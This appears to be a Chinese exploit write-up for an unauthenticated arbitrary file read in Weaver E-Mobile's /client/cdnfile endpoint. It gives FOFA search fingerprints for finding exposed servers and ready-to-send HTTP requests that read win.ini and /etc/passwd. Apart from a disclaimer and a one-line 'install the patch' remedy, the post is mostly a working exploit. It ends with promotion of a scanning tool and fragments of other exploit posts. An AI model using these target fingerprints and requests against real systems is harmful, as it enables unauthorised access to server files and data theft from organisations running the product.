泛微E-Mobile cdnfile任意文件读取

0x00 前言

免责声明

文章仅用作网络安全人员对自己网站、服务器等进行自查检测，不可用于其他用途，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作
本次测试只作为学习用处，请勿未授权进行渗透测试，切勿用于其它用途！

0x01 产品介绍

泛微e-Mobile移动管理平台是一款由泛微软件开发的企业移动办公解决方案。它提供了一系列的功能和工具，使企业员工能够通过移动设备随时随地地进行办公和协作。

0x02 漏洞描述

在/client/cdnfile接口存在任意文件读取漏洞，攻击者可以未授权下载服务器上任意文件，造成信息泄露。

0x03 资产梳理

FOFA：title="移动管理平台-企业管理"
FOFA：icon_hash="2062026853"

0x04 漏洞复现

windows请求包

GET /client/cdnfile/1C/Windows/win.ini HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

linux请求包

GET /client/cdnfile/C/etc/passwd HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: xx.xx.xx.xx

响应示例

0x05 修复方案

安装升级补丁

0x06 漏洞检测

林乐天的协助平台

SecScan

关于SecScan

POC格式为作者自行开发设计，在一次一次实战中更新优化后的结果
了解工具：https://www.birdy02.com/docs/secscan
关注 https://www.birdy02.com/tags/SecScan 了解更多

IIS短文件名枚举

0x00 前言免责声明文章仅用作网络安全人员对自己网站、服务器等进行自查检测，不可用于其他用途，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作本次测试只作为学习用处，请勿未授权进行渗透测试，切勿用于其它用途！ 0x01 产品介绍 iis是Internet Information

Nacos未授权配置信息下载

0x00 前言免责声明文章仅用作网络安全人员对自己网站、服务器等进行自查检测，不可用于其他用途，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作本次测试只作为学习用处，请勿未授权进行渗透测试，切勿用于其它用途！ 0x01 产品介绍